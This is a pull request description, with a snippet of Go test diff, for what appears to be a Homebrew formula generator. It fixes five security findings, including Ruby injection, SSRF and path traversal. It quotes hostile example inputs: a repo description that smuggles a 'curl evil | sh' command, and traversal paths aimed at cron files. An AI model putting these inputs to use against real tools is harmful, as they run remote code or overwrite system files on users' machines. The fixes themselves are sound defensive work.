+	path := chdirWithFile(t, "README.md", "# Project\n\n## Tools\n")
 
 	cf := &ConfigFile{Tap: "t"}
 	ud := UpdateDoc{File: path, Section: "## Tools"}


### PR DESCRIPTION
Addresses findings #1–#5 from the security review run against the project. Each fix is a separate commit so individual issues can be reviewed, reverted, or backported independently.

## Findings & fixes (one commit each)

**#1 High — Ruby injection via `.Description` (and other user-controlled strings in the template)**
A repo description like `foo" ; system "curl evil | sh` escapes the Ruby `desc "..."` literal and runs at `brew install` time. Added a `rubystring` template func that escapes `\`, `"`, and `#` (to defang `#{...}` interpolation) and applied it to every user-sourced field the template writes into Ruby double-quoted context.

**#2 High — No URL-scheme validation on asset downloads**
The SHA256 fallback path handed whatever URL came back from the API straight to `http.NewRequest`. A compromised GHE, MitM, or buggy API response could redirect fetches at cloud IMDS (`169.254.169.254`) or LAN hosts. Added `isAllowedAssetURL` gate: `https` anywhere, `http` only on loopback (preserves httptest-based tests; cloud metadata and LAN SSRF targets are all non-loopback).

**#3 Medium — Path traversal in `Repo` and `UpdateDoc.File`**
`ExpandVersions` builds `OutputFile = {Repo}.rb`; `UpdateDoc.File` feeds `os.Open`. A YAML config with `repo: "../../etc/cron.d/evil"` or `file: "/etc/crontab"` could steer writes anywhere the user can modify. Added `Recipe.Validate()` (rejects empty / `.` / `..` / separator / NUL in owner+repo) called from `Brew.Run`, and `validateDocFile()` (rejects absolute paths and `..`-traversal) called at the top of `UpdateDoc.Update`. Existing Update tests were using absolute tempdir paths — switched to `t.Chdir` + relative, matching the shape real users write in YAML.

**#4 Medium — `lib/private_access.rb` written with `0777`**
Generated formulas `require_relative` this file at `brew install` time; world-writable meant any local user on a shared host could inject Ruby. Tightened to `0755` on the dir, `0644` on the file.

**#5 Medium — Unbounded body read on 403 rate-limit probe**
`looksLikeRateLimit` did `io.ReadAll(resp.Body)` with no size cap. A misbehaving proxy returning a multi-GB body could OOM the tool (painful on CI). Wrapped in `io.LimitReader(..., 64 KiB)` — far above any real GitHub error payload.

## Test plan

- [x] New unit tests for each finding (`TestRubyStringEscape`, `TestGenerate_EscapesRubyInjection*`, `TestSha256_RejectsNonLoopbackHTTP` / `_RejectsFileURL` / `_RejectsLANHost`, `TestIsAllowedAssetURL`, `TestRecipe_Validate`, `TestValidateDocFile`, `TestUpdate_RejectsAbsolutePath` / `_RejectsTraversal`, `TestBrew_Run_RejectsRepoPathTraversal`, `TestWriteLibFile_PermissionsAreNotWorldWritable`, `TestRetry_403BodyReadIsCapped`)
- [x] `go test -race ./...` passes
- [x] `go vet ./...` clean
- [x] No dependency churn

## What this does NOT do

These are the findings I flagged as "Low / informational" and explicitly left out of scope (can open a follow-up if you want):
- `configuredToken` is a package-level var with no mutex (currently safe by ordering)
- Debug `puts "URL:"+@url` in `private_strategy.rb` (stray logging, not a leak)
- No `--max-wait` flag to cap `Retry-After` below 60 minutes for CI